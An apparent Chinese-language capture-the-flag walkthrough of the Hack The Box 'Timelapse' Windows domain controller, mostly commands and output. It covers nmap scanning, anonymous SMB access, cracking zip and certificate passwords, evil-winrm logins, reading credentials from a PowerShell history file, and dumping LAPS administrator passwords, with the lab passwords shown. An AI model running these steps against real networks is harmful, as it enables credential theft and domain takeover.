nmap -p- -v -sV -A -sC --min-rate 10000 -Pn 10.10.11.152
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-14 21:22:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after: 2022-10-25T14:25:29
| MD5: e233 a199 4504 0859 013f b9c5 e4f6 91c3
|_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
|_ssl-date: 2022-12-14T21:23:59+00:00; +7h59m59s from scanner time.
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-14T21:23:21
|_ start_date: N/A
得到域控机器名dc01.timelapse.htb,域名timelapse.htb
把域控名配进host
rpc匿名登录但没有权限
smbclient --no-pass -L //10.10.11.152
在Shares里找到一个备份文件
smbclient --no-pass //10.10.11.152/Shares
但这个winrm备份压缩包有密码
zip2john winrm_backup.zip >1.txt
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt
john --show 1.txt
显示有点怪,但应该是supremelegacy
成功解压
unzip -P supremelegacy winrm_backup.zip
谷歌搜索winrm pfx,wadcoms显示把pfx转换成pem后可用evil-winrm连接
how-to-export-certificates-from-windows-for-use-in-apache-nginx-on-linux/
sudo apt install john-data
pfx2john legacyy_dev_auth.pfx|tee pfx.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pfx.hash
得到密码thuglegacy。继续转换pem。
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem
这里要求给pem证书设置密码,我直接设为test123
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem
openssl rsa -in key.pem -out server.key
其中cert.pem包含公钥,server.key是私钥
evil-winrm -i 10.10.11.152 -c cert.pem -k server.key -S
Administrator
babywyrm
Guest
krbtgt
legacyy
payl0ad
sinfulz
svc_deploy
thecybergeek
上传privescheck没什么利用点,上传SharpHound.exe发现被杀了,无法运行。本地网络监听程序也没有可疑的。只能翻翻文件了。
在C:\Shares\HelpDesk下有几个laps相关的文档和msi安装包
猜测可能与LAPS保存密码相关
查看历史记录时发现svc_deploy用户的密码
cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
尝试winrm登录成功
evil-winrm -i dc01.timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
whoami /groups
信息里发现一个TIMELAPSE\LAPS_Readers
但是看hacktricks找的工具LAPSToolkit也被杀了,得另寻办法读密码
谷歌搜索powershell read laps password,发现文章export-laps-passwords-powershell
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime $Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime $computers | Export-Csv -path c:\users\danny\desktop"LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation
只需要执行
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
evil-winrm -i dc01.timelapse.htb -u administrator -p 'u%79X5wp3B69ZMbw44vFo61k' -S
成功以管理员身份登录
ls -Path c:\users -Recurse -Name root.txt
type c:\users\TRX\Desktop\root.txt
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。